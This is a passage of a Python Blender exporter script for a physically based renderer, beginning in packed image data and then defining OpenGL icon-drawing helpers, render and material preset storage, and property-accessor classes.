A/AAA/BBB/BBB/BBB/BBB/CCC/CCC/CCC/DDD/DDD/DDD/EEE/EEE/EEF/FFF/FFF/GGG/GGG/GGH/HHH/HHH/III/III/JJJ/JJJ/KJJ/KKK/KKK/LLL/LLL/MMM/MMM/NNN/NNN/OOO/OOO/PPP/PPP/QQQ/QQQ/RRR/RSR/SSS/TTT/TTT/UUU/UUU/VVV/VVV/WWW/WWW/XXX/YXX/YYY/ZZZ/ZZZ/aaa/aaa/bbb/cbb/ccc/ddd/ddd/eee/eee/fff/ffg/ggg/hhh/hhh/iii/iii/jjj/kkj/kkk/lll/lll/mmm/mmn/nnn/ono/ooo/ppp/ppp/qqq/qqq/rrr/rrr/sss/stt/ttt/tuu/uuu/vvv/vvv/www/www/xxx/xxx/yyy/yyy/zzz/zzz/000/000/111/111/111/222/222/333/333/444/444/554/555/555/666/666/766/777/777/777/888/888/999/999/999/9++/+++/+++/+++/////////////AAA/AAA/AAA/AAA/BBB/BBB/BBB/BCC/CCC/CCC/DCC/DDD/DDD/DDD/EEE/EEE/FEF/FFF/FFF/GGG/GGG/GGG/HHH/HHH/III/III/JJJ/JJJ/KJJ/KKK/KLK/LLL/LLL/MMM/MMM/NNN/NNN/OOO/OOO/PPP/PPP/QQQ/RQQ/RRR/SRR/SSS/STT/TTT/UTU/UUU/VVV/VVV/WWW/WWW/XXX/XXX/YYY/ZZZ/ZZZ/aaa/aaa/bbb/cbb/ccc/ddd/ddd/eee/eee/fff/ggg/ggg/hhh/hhh/iii/iii/jjj/jjk/kkk/lll/lll/mmm/mmm/nnn/ooo/ooo/ppp/ppp/qqq/qqq/rrr/rrr/sss/tst/ttt/utt/uuu/vvv/vvv/www/www/xxx/xxx/yyy/yyy/zzz/zzz/000/000/111/111/122/222/222/333/333/444/444/555/555/555/666/666/667/777/777/888/888/888/999/999/999/++9/+++/+++/+++/////////////AAA/AAA/AAA/AAA/BBB/BBB/BBB/BBB/CCC/CCC/CCC/DDD/DDD/DDD/EEE/EEE/FEE/FFF/FFF/GGG/GGG/HGG/HHH/HHH/III/III/JJJ/JJJ/JKJ/KKK/KKK/LLL/LLL/MMM/MMM/NNN/NNN/OOO/OOO/PPP/PPP/QQQ/QRQ/RRR/RRS/SSS/TST/TTT/UUU/UUU/VVV/VVV/WWW/WWW/XXX/XYY/YYY/ZZZ/ZZZ/aaa/aaa/bbb/bcc/ccc/ddd/ddd/eee/eee/fff/gfg/ggg/hhh/hhh/iii/iii/jjj/jjk/kkk/
lll/lll/mmm/mmm/nnn/onn/ooo/ppp/ppp/qqq/qqq/rrr/rrr/sss/tst/ttt/uuu/uuu/vvv/vvv/www/www/xxx/xxx/yyy/yyy/zzz/zzz/000/000/111/111/211/222/222/333/333/444/444/455/555/555/666/666/776/777/777/887/888/888/899/999/999/999/+++/+++/+++/////////////AAA/AAA/AAA/AAA/BBB/BBB/BBB/CBC/CCC/CCC/CCC/DDD/DDD/DDD/EEE/EEE/EEF/FFF/FFF/GGG/GGG/HHG/HHH/HHH/III/III/JJJ/JJJ/KKJ/KKK/KKK/LLL/LLL/MMM/MMM/NNN/NNN/OOO/OOO/PPP/PPP/QQQ/QQR/RRR/RRR/SSS/STT/TTT/UUU/UUU/VVV/VVV/WWW/WWW/XXX/XXX/YYY/ZZZ/ZZZ/aaa/aaa/bbb/bcb/ccc/ddd/ddd/eee/eee/fff/gff/ggg/hhh/hhh/iii/iii/jjj/jkk/kkk/lll/lll/mmm/mmm/nnn/noo/ooo/ppp/ppp/qqq/qqq/rrr/rrr/sss/sss/ttt/uuu/uuu/vvv/vvv/www/www/xxx/xxx/yyy/yyy/zzz/zzz/000/000/111/111/211/222/322/333/333/444/444/554/555/555/666/666/766/777/777/878/888/888/999/999/999/+9+/+++/+++/+++/////////////AAA/AAA/AAA/AAA/BBB/BBB/BBB/BBB/CCC/CCC/CCC/DDD/DDD/DDD/EEE/EEE/EEF/FFF/FFF/GGG/GGG/GGH/HHH/HHH/III/III/JJJ/JJJ/KJJ/KKK/KKK/LLL/LLL/MMM/MMM/NNN/NNN/OOO/OOO/PPP/PPP/QQQ/QQQ/RRR/RSR/SSS/TTT/TTT/UUU/UUU/VVV/VVV/WWW/WWW/XXX/YXX/YYY/ZZZ/ZZZ/aaa/aaa/bbb/cbb/ccc/ddd/ddd/eee/eee/fff/ffg/ggg/hhh/hhh/iii/iii/jjj/kkj/kkk/lll/lll/mmm/mmn/nnn/ono/ooo/ppp/ppp/qqq/qqq/rrr/rrr/sss/stt/ttt/tuu/uuu/vvv/vvv/www/www/xxx/xxx/yyy/yyy/zzz/zzz/000/000/111/111/111/222/222/333/333/444/444/554/555/555/666/666/766/777/777/777/888/888/999/999/999/9++/+++/+++/+++/////////////AAA/AAA/AAA/AAA/BBB/BBB/BBB/BCC/CCC/CCC/DCC/DDD/DDD/DDD/EEE/EEE/FEF/FFF/FFF/GGG/GGG/GGG/HHH/HHH/III/III/JJJ/JJJ/KJJ/KKK/KLK/LLL/LLL/MMM/MMM/NNN/NNN/OOO/OOO/PPP/PPP/QQQ/RQQ/RRR/SRR/SSS/STT/TTT/UTU/UUU/VVV/VVV/WWW/WWW/XXX/XXX/YYY/ZZZ/ZZZ/aaa/aaa/bbb/cbb/ccc/ddd/ddd/eee/eee/fff/ggg/ggg/hhh/hhh/iii/iii/jjj/jjk/kkk/lll/lll/mmm/mmm/nnn/ooo/ooo/ppp/ppp/qqq/qqq/rrr/rrr/sss/tst/ttt/utt/uuu/vvv/vvv/www/www/xxx/xxx/yyy/yyy/zzz/zzz/000/000/111/111/122/222/222/333/333/444/444/555/555/555/666/666/667/777/777/888/888/888/999/999/999/++9/+++/+++/+++/////////////AAA/AAA/AAA/AAA/BBB/BBB/BBB/BBB/CCC/CCC/CCC/DDD/DDD/DDD/EEE/EEE/FEE/FFF/FFF/GGG/GGG/HGG/HHH/HHH/III/III/
JJJ/JJJ/JKJ/KKK/KKK/LLL/LLL/MMM/MMM/NNN/NNN/OOO/OOO/PPP/PPP/QQQ/QRQ/RRR/RRS/SSS/TST/TTT/UUU/UUU/VVV/VVV/WWW/WWW/XXX/XYY/YYY/ZZZ/ZZZ/aaa/aaa/bbb/bcc/ccc/ddd/ddd/eee/eee/fff/gfg/ggg/hhh/hhh/iii/iii/jjj/jjk/kkk/lll/lll/mmm/mmm/nnn/onn/ooo/ppp/ppp/qqq/qqq/rrr/rrr/sss/tst/ttt/uuu/uuu/vvv/vvv/www/www/xxx/xxx/yyy/yyy/zzz/zzz/000/000/111/111/211/222/222/333/333/444/444/455/555/555/666/666/776/777/777/887/888/888/899/999/999/999/+++/+++/+++/////////////AAA/AAA/AAA/AAA/BBB/BBB/BBB/CBC/CCC/CCC/CCC/DDD/DDD/DDD/EEE/EEE/EEF/FFF/FFF/GGG/GGG/HHG/HHH/HHH/III/III/JJJ/JJJ/KKJ/KKK/KKK/LLL/LLL/MMM/MMM/NNN/NNN/OOO/OOO/PPP/PPP/QQQ/QQR/RRR/RRR/SSS/STT/TTT/UUU/UUU/VVV/VVV/WWW/WWW/XXX/XXX/YYY/ZZZ/ZZZ/aaa/aaa/bbb/bcb/ccc/ddd/ddd/eee/eee/fff/gff/ggg/hhh/hhh/iii/iii/jjj/jkk/kkk/lll/lll/mmm/mmm/nnn/noo/ooo/ppp/ppp/qqq/qqq/rrr/rrr/sss/sss/ttt/uuu/uuu/vvv/vvv/www/www/xxx/xxx/yyy/yyy/zzz/zzz/000/000/111/111/211/222/322/333/333/444/444/554/555/555/666/666/766/777/777/878/888/888/999/999/999/+9+/+++/+++/+++/////////////GBA+AAA/AAA/AAA/BBB/BBB/BBB/BBB/CCC/CCC/CCC/DDD/DDD/DDD/EEE/EEE/EEF/FFF/FFF/GGG/GGG/GGH/HHH/HHH/III/III/JJJ/JJJ/KJJ/KKK/KKK/LLL/LLL/MMM/MMM/NNN/NNN/OOO/OOO/PPP/PPP/QQQ/QQQ/RRR/RSR/SSS/TTT/TTT/UUU/UUU/VVV/VVV/WWW/WWW/XXX/YXX/YYY/ZZZ/ZZZ/aaa/aaa/bbb/cbb/ccc/ddd/ddd/eee/eee/fff/ffg/ggg/hhh/hhh/iii/iii/jjj/kkj/kkk/lll/lll/mmm/mmn/nnn/ono/ooo/ppp/ppp/qqq/qqq/rrr/rrr/sss/stt/ttt/tuu/uuu/vvv/vvv/www/www/xxx/xxx/yyy/yyy/zzz/zzz/000/000/111/111/111/222/222/333/333/444/444/554/555/555/666/666/766/777/777/777/888/888/999/999/999/9++/+++/+++/+++/////////++/+OCA5AAA/AAA/AAA/BBB/BBB/BBB/BCC/CCC/CCC/DCC/DDD/DDD/DDD/EEE/EEE/FEF/FFF/FFF/GGG/GGG/GGG/HHH/HHH/III/III/JJJ/JJJ/KJJ/KKK/KLK/LLL/LLL/MMM/MMM/NNN/NNN/OOO/OOO/PPP/PPP/QQQ/RQQ/RRR/SRR/SSS/STT/TTT/UTU/UUU/VVV/VVV/WWW/WWW/XXX/XXX/YYY/ZZZ/ZZZ/aaa/aaa/bbb/cbb/ccc/ddd/ddd/eee/eee/fff/ggg/ggg/hhh/hhh/iii/iii/jjj/jjk/kkk/lll/lll/mmm/mmm/nnn/ooo/ooo/ppp/ppp/qqq/qqq/rrr/rrr/sss/tst/ttt/utt/uuu/vvv/vvv/www/www/xxx/xxx/yyy/yyy/zzz/zzz/000/000/111/111/122/222/
222/333/333/444/444/555/555/555/666/666/667/777/777/888/888/888/999/999/999/++9/+++/+++/+++/////////89/5WEAsAAA/AAA/AAA/BBB/BBB/BBB/BBB/CCC/CCC/CCC/DDD/DDD/DDD/EEE/EEE/FEE/FFF/FFF/GGG/GGG/HGG/HHH/HHH/III/III/JJJ/JJJ/JKJ/KKK/KKK/LLL/LLL/MMM/MMM/NNN/NNN/OOO/OOO/PPP/PPP/QQQ/QRQ/RRR/RRS/SSS/TST/TTT/UUU/UUU/VVV/VVV/WWW/WWW/XXX/XYY/YYY/ZZZ/ZZZ/aaa/aaa/bbb/bcc/ccc/ddd/ddd/eee/eee/fff/gfg/ggg/hhh/hhh/iii/iii/jjj/jjk/kkk/lll/lll/mmm/mmm/nnn/onn/ooo/ppp/ppp/qqq/qqq/rrr/rrr/sss/tst/ttt/uuu/uuu/vvv/vvv/www/www/xxx/xxx/yyy/yyy/zzz/zzz/000/000/111/111/211/222/222/333/333/444/444/455/555/555/666/666/776/777/777/887/888/888/899/999/999/999/+++/+++/+++/////////78/scFASKCA9AAA/AAA/BBB/BBB/BBB/CBC/CCC/CCC/CCC/DDD/DDD/DDD/EEE/EEE/EEF/FFF/FFF/GGG/GGG/HHG/HHH/HHH/III/III/JJJ/JJJ/KKJ/KKK/KKK/LLL/LLL/MMM/MMM/NNN/NNN/OOO/OOO/PPP/PPP/QQQ/QQR/RRR/RRR/SSS/STT/TTT/UUU/UUU/VVV/VVV/WWW/WWW/XXX/XXX/YYY/ZZZ/ZZZ/aaa/aaa/bbb/bcb/ccc/ddd/ddd/eee/eee/fff/gff/ggg/hhh/hhh/iii/iii/jjj/jkk/kkk/lll/lll/mmm/mmm/nnn/noo/ooo/ppp/ppp/qqq/qqq/rrr/rrr/sss/sss/ttt/uuu/uuu/vvv/vvv/www/www/xxx/xxx/yyy/yyy/zzz/zzz/000/000/111/111/211/222/322/333/333/444/444/554/555/555/666/666/766/777/777/878/888/888/999/999/999/+9+/+++/+++/+++/////99/967/S///AXEApBAA/AAA/BBB/BBB/BBB/BBB/CCC/CCC/CCC/DDD/DDD/DDD/EEE/EEE/EEF/FFF/FFF/GGG/GGG/GGH/HHH/HHH/III/III/JJJ/JJJ/KJJ/KKK/KKK/LLL/LLL/MMM/MMM/NNN/NNN/OOO/OOO/PPP/PPP/QQQ/QQQ/RRR/RSR/SSS/TTT/TTT/UUU/UUU/VVV/VVV/WWW/WWW/XXX/YXX/YYY/ZZZ/ZZZ/aaa/aaa/bbb/cbb/ccc/ddd/ddd/eee/eee/fff/ffg/ggg/hhh/hhh/iii/iii/jjj/kkj/kkk/lll/lll/mmm/mmn/nnn/ono/ooo/ppp/ppp/qqq/qqq/rrr/rrr/sss/stt/ttt/tuu/uuu/vvv/vvv/www/www/xxx/xxx/yyy/yyy/zzz/zzz/000/000/111/111/111/222/222/333/333/444/444/554/555/555/666/666/766/777/777/777/888/888/999/999/999/9++/+++/+++/+++/////67/p///A///A///AVEAvBAA/BBB/BBB/BBB/BCC/CCC/CCC/DCC/DDD/DDD/DDD/EEE/EEE/FEF/FFF/FFF/GGG/GGG/GGG/HHH/HHH/III/III/JJJ/JJJ/KJJ/KKK/KLK/LLL/LLL/MMM/MMM/NNN/NNN/OOO/OOO/PPP/PPP/QQQ/RQQ/RRR/SRR/SSS/STT/TTT/UTU/UUU/VVV/VVV/WWW/WWW/XXX/XXX/YYY/ZZZ/ZZZ/aaa/
aaa/bbb/cbb/ccc/ddd/ddd/eee/eee/fff/ggg/ggg/hhh/hhh/iii/iii/jjj/jjk/kkk/lll/lll/mmm/mmm/nnn/ooo/ooo/ppp/ppp/qqq/qqq/rrr/rrr/sss/tst/ttt/utt/uuu/vvv/vvv/www/www/xxx/xxx/yyy/yyy/zzz/zzz/000/000/111/111/122/222/222/333/333/444/444/555/555/555/666/666/667/777/777/888/888/888/999/999/999/++9/+++/+++/+++/78/v///A///A///A///A///AXFApKDA9BBB/BBB/BBB/CCC/CCC/CCC/DDD/DDD/DDD/EEE/EEE/FEE/FFF/FFF/GGG/GGG/HGG/HHH/HHH/III/III/JJJ/JJJ/JKJ/KKK/KKK/LLL/LLL/MMM/MMM/NNN/NNN/OOO/OOO/PPP/PPP/QQQ/QRQ/RRR/RRS/SSS/TST/TTT/UUU/UUU/VVV/VVV/WWW/WWW/XXX/XYY/YYY/ZZZ/ZZZ/aaa/aaa/bbb/bcc/ccc/ddd/ddd/eee/eee/fff/gfg/ggg/hhh/hhh/iii/iii/jjj/jjk/kkk/lll/lll/mmm/mmm/nnn/onn/ooo/ppp/ppp/qqq/qqq/rrr/rrr/sss/tst/ttt/uuu/uuu/vvv/vvv/www/www/xxx/xxx/yyy/yyy/zzz/zzz/000/000/111/111/211/222/222/333/333/444/444/455/555/555/666/666/776/777/777/887/888/888/899/999/999/999/+++/89+967/p///A///A///A///A///A///A///AdHASXGAsQFB5IDB+CCC/CCC/CCC/DDD/DDD/DDD/EEE/EEE/EEF/FFF/FFF/GGG/GGG/HHG/HHH/HHH/III/III/JJJ/JJJ/KKJ/KKK/KKK/LLL/LLL/MMM/MMM/NNN/NNN/OOO/OOO/PPP/PPP/QQQ/QQR/RRR/RRR/SSS/STT/TTT/UUU/UUU/VVV/VVV/WWW/WWW/XXX/XXX/YYY/ZZZ/ZZZ/aaa/aaa/bbb/bcb/ccc/ddd/ddd/eee/eee/fff/gff/ggg/hhh/hhh/iii/iii/jjj/jkk/kkk/lll/lll/mmm/mmm/nnn/noo/ooo/ppp/ppp/qqq/qqq/rrr/rrr/sss/sss/ttt/uuu/uuu/vvv/vvv/www/www/xxx/xxx/yyy/yyy/zzz/zzz/000/000/111/111/211/222/322/333/333/444/444/554/555/555/666/666/766/777/777/878/888/888/999/999/88++78+567+s56/S///A///A///A///A")
def drawIcon(icon, x, y):
	"""Blit a 16x16 RGBA icon buffer at pixel position (x, y) with alpha blending."""
	gl = BGL
	gl.glEnable(gl.GL_BLEND)
	gl.glBlendFunc(gl.GL_SRC_ALPHA, gl.GL_ONE_MINUS_SRC_ALPHA)
	# +0.5 centers the raster position on the pixel grid
	gl.glRasterPos2f(int(x) + 0.5, int(y) + 0.5)
	gl.glDrawPixels(16, 16, gl.GL_RGBA, gl.GL_UNSIGNED_BYTE, icon)
	gl.glDisable(gl.GL_BLEND)
def drawArrow(icon, x, y):
	"""Blit a 22x22 RGBA arrow buffer at pixel position (x, y) with alpha blending."""
	gl = BGL
	gl.glEnable(gl.GL_BLEND)
	gl.glBlendFunc(gl.GL_SRC_ALPHA, gl.GL_ONE_MINUS_SRC_ALPHA)
	# +0.5 centers the raster position on the pixel grid
	gl.glRasterPos2f(int(x) + 0.5, int(y) + 0.5)
	gl.glDrawPixels(22, 22, gl.GL_RGBA, gl.GL_UNSIGNED_BYTE, icon)
	gl.glDisable(gl.GL_BLEND)
def drawLogo(icon, x, y):
	"""Blit the 118x18 RGBA logo buffer at pixel position (x, y) with alpha blending."""
	gl = BGL
	gl.glEnable(gl.GL_BLEND)
	gl.glBlendFunc(gl.GL_SRC_ALPHA, gl.GL_ONE_MINUS_SRC_ALPHA)
	# +0.5 centers the raster position on the pixel grid
	gl.glRasterPos2f(int(x) + 0.5, int(y) + 0.5)
	gl.glDrawPixels(118, 18, gl.GL_RGBA, gl.GL_UNSIGNED_BYTE, icon)
	gl.glDisable(gl.GL_BLEND)
def drawBar(icon, x, y):
	"""Blit a 138x17 RGBA bar buffer (e.g. spectrum bars) at (x, y) with alpha blending."""
	gl = BGL
	gl.glEnable(gl.GL_BLEND)
	gl.glBlendFunc(gl.GL_SRC_ALPHA, gl.GL_ONE_MINUS_SRC_ALPHA)
	# +0.5 centers the raster position on the pixel grid
	gl.glRasterPos2f(int(x) + 0.5, int(y) + 0.5)
	gl.glDrawPixels(138, 17, gl.GL_RGBA, gl.GL_UNSIGNED_BYTE, icon)
	gl.glDisable(gl.GL_BLEND)
#-------------------------------------------------
# luxImage()
# helper class to handle images and icons for the GUI
#-------------------------------------------------
class luxImage:
	"""RGBA image wrapper around a BGL pixel buffer, used for GUI icons and
	render previews.  Pixel data lives in ``self.buf`` indexed [y][x][channel]."""
	def resize(self, width, height):
		"""Allocate a fresh width*height*4 byte GL buffer, discarding old content."""
		self.width = width
		self.height = height
		self.buf = BGL.Buffer(BGL.GL_BYTE, [width, height, 4]) # GL buffer
	def __init__(self, width=0, height=0):
		self.resize(width, height)
	def draw(self, x, y):
		"""Blit the buffer at pixel position (x, y) with alpha blending."""
		gl = BGL
		gl.glEnable(gl.GL_BLEND)
		gl.glBlendFunc(gl.GL_SRC_ALPHA, gl.GL_ONE_MINUS_SRC_ALPHA)
		gl.glRasterPos2f(int(x) + 0.5, int(y) + 0.5)
		gl.glDrawPixels(self.width, self.height, gl.GL_RGBA, gl.GL_UNSIGNED_BYTE, self.buf)
		gl.glDisable(gl.GL_BLEND)
	def decodeStr(self, width, height, s):
		"""Fill the buffer from a packed character string, 4 chars per pixel.

		Each char is decoded by base64value() and scaled by 4.048 (presumably
		mapping a 0..63 code range onto 0..255 -- confirm against base64value).
		"""
		self.resize(width, height)
		pos = 0
		for row in range(self.height):
			for col in range(self.width):
				for chan in range(4):
					self.buf[row][col][chan] = int(base64value(s[pos]) * 4.048)
					pos += 1
	def decodeLuxConsole(self, width, height, data):
		"""Fill the buffer from raw RGB byte data, flipping rows vertically and
		forcing the alpha channel to fully opaque."""
		self.resize(width, height)
		pos = 0
		# rows are written bottom-up: the source data is vertically flipped
		for row in range(self.height - 1, -1, -1):
			for col in range(self.width):
				for chan in range(3):
					self.buf[row][col][chan] = ord(data[pos])
					pos += 1
				self.buf[row][col][3] = 255
previewCache = {} # dictionary that will hold all preview images
######################################################
# New GUI by Zuegs
######################################################
from types import *
# Blender.Draw button event codes dispatched by the GUI event handler.
evtLuxGui = 99
evtSavePreset = 98
evtDeletePreset = 97
evtSaveMaterial = 96
evtLoadMaterial = 95
evtDeleteMaterial = 94
evtConvertMaterial = 92  # NOTE(review): code 93 is skipped -- presumably a retired event; confirm before reusing
evtSaveMaterial2 = 91
evtLoadMaterial2 = 90
# default settings
# Property names never written into the persisted global defaults (session/GUI state only).
defaultsExclude = ['preset','filename','page','link']
# Load the stored global defaults from Blender's registry; fall back to an
# empty dict when the key is missing, unreadable, or not a dict.
try:
	luxdefaults = Blender.Registry.GetKey('pbrtblend', True)
	if not(type(luxdefaults) is DictType):
		luxdefaults = {}
except:
	luxdefaults = {}
# Working copy that accumulates user changes; persisted by saveluxdefaults().
newluxdefaults = luxdefaults.copy()
def saveluxdefaults():
	"""Persist the accumulated default settings to Blender's registry.

	Best-effort: the transient 'page' GUI state is stripped first, and any
	failure (missing key, registry error) is silently ignored.
	"""
	try:
		del newluxdefaults['page']
	except:
		pass
	try:
		Blender.Registry.SetKey('pbrtblend', newluxdefaults, True)
	except:
		pass
# *** PRESETS **************************************
# Property names stripped before saving a preset: preset bookkeeping,
# machine-specific paths and display/gamma state that should not override
# another user's scene when the preset is applied.
presetsExclude = ['preset','lux','datadir','filename','page','RGC','film.gamma','colorclamp','link']
def getPresets(key):
	"""Fetch the preset dictionary stored under *key* in Blender's registry.

	Returns an empty dict when nothing (or a non-dict value) is stored.
	"""
	stored = Blender.Registry.GetKey(key, True)
	if type(stored) is DictType:
		return stored
	return {}
def getScenePresets():
	"""Return the render presets: user-saved ones merged with three factory presets.

	User presets from the registry are copied first, then the factory presets
	are (re)inserted so they always exist under their fixed names.
	"""
	presets = getPresets('pbrtblend_presets').copy()
	# settings shared by every factory preset
	common = {
		'haltspp': 0,
		'useparamkeys': 'false',
		'sampler.showadvanced': 'false',
		'sintegrator.showadvanced': 'false',
		'pixelfilter.showadvanced': 'false',
		'pixelfilter.type': 'mitchell',
		'pixelfilter.mitchell.sharp': 0.250,
		'pixelfilter.mitchell.xwidth': 2.0,
		'pixelfilter.mitchell.ywidth': 2.0,
		'pixelfilter.mitchell.optmode': "slider" }
	def factory(displayinterval, specific):
		# merge the shared settings with one preset's specific settings
		d = common.copy()
		d['film.displayinterval'] = displayinterval
		d.update(specific)
		return d
	presets['0 Preview - Direct Lighting'] = factory(4, {
		"renderer.type": "sample",
		'sampler.type': 'lowdiscrepancy',
		'sampler.lowdisc.pixelsamples': 1,
		'sampler.lowdisc.pixelsampler': 'lowdiscrepancy',
		'sintegrator.type': 'directlighting',
		'sintegrator.dlighting.maxdepth': 5 })
	presets['1 Preview - MLT Path Tracing'] = factory(8, {
		'renderer.type': 'metropolis',
		'renderer.metro.samplesperpixel': 32,
		'renderer.metro.dodirectseparately': 'true',
		'renderer.metro.directsamples': 2 })
	presets['2 Final - MLT Path Tracing'] = factory(8, {
		'renderer.type': 'metropolis',
		'renderer.metro.samplesperpixel': 2000,
		'renderer.metro.dodirectseparately': 'true',
		'renderer.metro.directsamples': 64 })
	return presets
def getMaterialPresets():
	"""Return the user-saved material presets dict from Blender's registry."""
	return getPresets('pbrtblend_materials')
def savePreset(key, name, d):
	"""Store preset *d* under *name* inside the registry entry *key*.

	A falsy *d* removes the named preset instead.  Any failure (missing
	registry key, unknown preset name, registry error) is silently ignored.
	"""
	try:
		presets = getPresets(key)
		if d:
			presets[name] = d.copy() # copy so later caller edits don't leak into the registry
		else:
			presets.pop(name) # raises KeyError (swallowed below) when absent
		Blender.Registry.SetKey(key, presets, True)
	except:
		pass
def saveScenePreset(name, d):
	"""Strip the excluded keys from *d* in place, then save it as scene preset *name*."""
	try:
		for excluded in presetsExclude:
			# per-key try keeps going even when d lacks the key
			try:
				del d[excluded]
			except:
				pass
		savePreset('pbrtblend_presets', name, d)
	except:
		pass
def saveMaterialPreset(name, d):
	"""Strip the excluded keys from *d* in place, then save it as material preset *name*."""
	try:
		for excluded in presetsExclude:
			# per-key try keeps going even when d lacks the key
			try:
				del d[excluded]
			except:
				pass
		savePreset('pbrtblend_materials', name, d)
	except:
		pass
# **************************************************
# Collects every property name/value read through luxProp.get() so the GUI
# can snapshot "everything currently in use" when storing a preset.
usedproperties = {} # global variable to collect used properties for storing presets
# When set to an object, only properties attached to that object are collected.
usedpropertiesfilterobj = None # assign an object to only collect the properties that are assigned to this object
# class to access properties (for lux settings)
class luxProp:
	"""Accessor for one named LuxRender setting stored in a Blender object's
	'pbrtblend' ID-property dict.

	Lookup order in get(): the object's own property, then a hash-bucketed
	fallback for over-long key names, then (for Scene objects only) the
	global ``luxdefaults``, and finally ``self.default``.  Every successful
	read is mirrored into the global ``usedproperties`` so presets can be
	snapshotted.
	"""
	def __init__(self, obj, name, default):
		self.obj = obj
		self.name = name
		# if len(name)>31: print("Warning: property-name \"%s\" has more than 31 chars."%(name))
		# Blender ID-properties limit key names to 31 chars, so longer names
		# are stored under a hashed key with "name = value" packed inside.
		self.hashmode = len(name)>31 # activate hash mode for keynames longer 31 chars (limited by blenders ID-prop)
		# NOTE(review): str.__hash__ is not stable across interpreter runs under
		# Python 3 hash randomization -- presumably fine on the embedded Python
		# this script targets; confirm before porting.
		self.hashname = "__hash:%x"%(name.__hash__())
		self.default = default
	def parseassignment(self, s, name):
		# Unpack "name = value" stored under a hashed key; warn on hash collisions.
		l = s.split(" = ")
		if l[0] != name: print("Warning: property-name \"%s\" has hash-collide with \"%s\"."%(name, l[0]))
		return l[1]
	def createassignment(self, name, value):
		# Pack name and value into one string for hash-mode storage.
		return "%s = %s"%(name, value)
	def get(self):
		"""Return the property value (see class docstring for the fallback
		chain); returns None when no object is attached."""
		global usedproperties, usedpropertiesfilterobj, luxdefaults
		if self.obj:
			try:
				value = self.obj.properties['pbrtblend'][self.name]
				if not(usedpropertiesfilterobj) or (usedpropertiesfilterobj == self.obj):
					usedproperties[self.name] = value
				return value
			except KeyError:
				try:
					# second chance: the value may live under the hashed key
					value = self.parseassignment(self.obj.properties['pbrtblend'][self.hashname], self.name)
					if not(usedpropertiesfilterobj) or (usedpropertiesfilterobj == self.obj):
						usedproperties[self.name] = value
					return value
				except KeyError:
					if self.obj.__class__.__name__ == "Scene": # luxdefaults only for global setting
						try:
							value = luxdefaults[self.name]
							if not(usedpropertiesfilterobj) or (usedpropertiesfilterobj == self.obj):
								usedproperties[self.name] = value
							return value
						except KeyError:
							if not(usedpropertiesfilterobj) or (usedpropertiesfilterobj == self.obj):
								usedproperties[self.name] = self.default
							return self.default
					if not(usedpropertiesfilterobj) or (usedpropertiesfilterobj == self.obj):
						usedproperties[self.name] = self.default
					return self.default
		return None
	def getobj(self):
		"""Return the object this property is attached to (None when unset)."""
		if self.obj:
			return self.obj
		else:
			return None
	def getname(self):
		"""Return the property key name (None when unset)."""
		if self.name:
			return self.name
		else:
			return None
	def set(self, value):
		"""Write *value* into the object's 'pbrtblend' dict; None deletes the entry.

		Scene-level writes are also mirrored into ``newluxdefaults`` and clear
		the stored preset reference, since the user diverged from the preset.
		"""
		global newluxdefaults
		if self.obj:
			if self.hashmode: n, v = self.hashname, self.createassignment(self.name, value)
			else: n, v = self.name, value
			if value is not None:
				try: self.obj.properties['pbrtblend'][n] = v
				except (KeyError, TypeError):
					# 'pbrtblend' container missing (or incompatible): create it first
					self.obj.properties['pbrtblend'] = {}
					self.obj.properties['pbrtblend'][n] = v
			else:
				try: del self.obj.properties['pbrtblend'][n]
				except: pass
			if self.obj.__class__.__name__ == "Scene": # luxdefaults only for global setting
				# value has changed, so these are user settings; remove preset reference
				if not(self.name in defaultsExclude):
					newluxdefaults[self.name] = value
					try: self.obj.properties['pbrtblend']['preset']=""
					except: pass
	def delete(self):
		"""Remove both the plain and the hash-mode entry for this property."""
		if self.obj:
			try: del self.obj.properties['pbrtblend'][self.name]
			except: pass
			try: del self.obj.properties['pbrtblend'][self.hashname]
			except: pass
	def getFloat(self):
		"""Coerce the value to float; 'x y z' strings yield their first component.

		NOTE(review): uses 'types.FloatType' attribute style although only
		'from types import *' is visible in this file -- relies on an
		'import types' elsewhere in the file; confirm it exists.
		"""
		v = self.get()
		if type(v) == types.FloatType: return float(v)
		try:
			if type(v) == types.StringType: return float(v.split(" ")[0])
		except: pass
		# value unusable: retry the same coercions on the default
		v = self.default
		if type(v) == types.FloatType: return float(v)
		try:
			if type(v) == types.StringType: return float(v.split(" ")[0])
		except: pass
		return 0.0
	def getInt(self):
		"""Coerce the value (or, failing that, the default) to int."""
		try: return int(self.get())
		except: return int(self.default)
	def getRGB(self):
		"""Alias of getVector(); colors are stored as 'r g b' strings."""
		return self.getVector()
	def getVector(self):
		"""Return the value as a 3-tuple of floats.

		Numeric scalars are broadcast to all three components; malformed or
		missing strings fall back to the default.
		"""
		v = self.get()
		if type(v) in [types.FloatType, types.IntType]: return (float(v), float(v), float(v))
		l = None
		try:
			if type(v) == types.StringType: l = self.get().split(" ")
		except: pass
		try:
			if (l==None) or (len(l) != 3): l = self.default.split(" ")
			return (float(l[0]), float(l[1]), float(l[2]))
		except AttributeError:
			# default has no split() (scalar default): broadcast first component
			return (float(l[0]), float(l[0]), float(l[0]))
	def getVectorStr(self):
		"""Return the vector formatted as 'x y z'."""
		return "%f %f %f"%self.getVector()
	def isFloat(self):
		"""True when the stored value is a plain float."""
		return type(self.get()) == types.FloatType
	def getRGC(self):
		"""Return the color as a string with reverse gamma correction (rg()) applied."""
		col = self.getRGB()
		return "%f %f %f"%(rg(col[0]), rg(col[1]),rg(col[2]))
	def setRGB(self, value):
		"""Store a color 3-tuple as an 'r g b' string."""
		self.set("%f %f %f"%(value[0], value[1], value[2]))
	def setVector(self, value):
		"""Store a 3-tuple as an 'x y z' string."""
		self.set("%f %f %f"%(value[0], value[1], value[2]))
# class to access blender attributes (for lux settings)
class luxAttr:
	"""Adapter exposing a single Blender object attribute through the same
	get/set interface as luxProp, so GUI widgets can drive either one."""
	def __init__(self, obj, name):
		self.obj = obj
		self.name = name
	def get(self):
		"""Return the wrapped attribute's value, or None when no object is set."""
		return getattr(self.obj, self.name) if self.obj else None
	def getFloat(self):
		return float(self.get())
	def getInt(self):
		return int(self.get())
	def getobj(self):
		"""Return the wrapped object (None when unset)."""
		return self.obj if self.obj else None
	def getname(self):
		"""Return the wrapped attribute name (None when unset)."""
		return self.name if self.name else None
	def set(self, value):
		"""Assign the attribute and force a full Blender window redraw."""
		if self.obj:
			setattr(self.obj, self.name, value)
			Window.QRedrawAll()
# class for dynamic gui
class luxGui:
	"""Left-to-right, top-down layout cursor for the dynamic GUI.

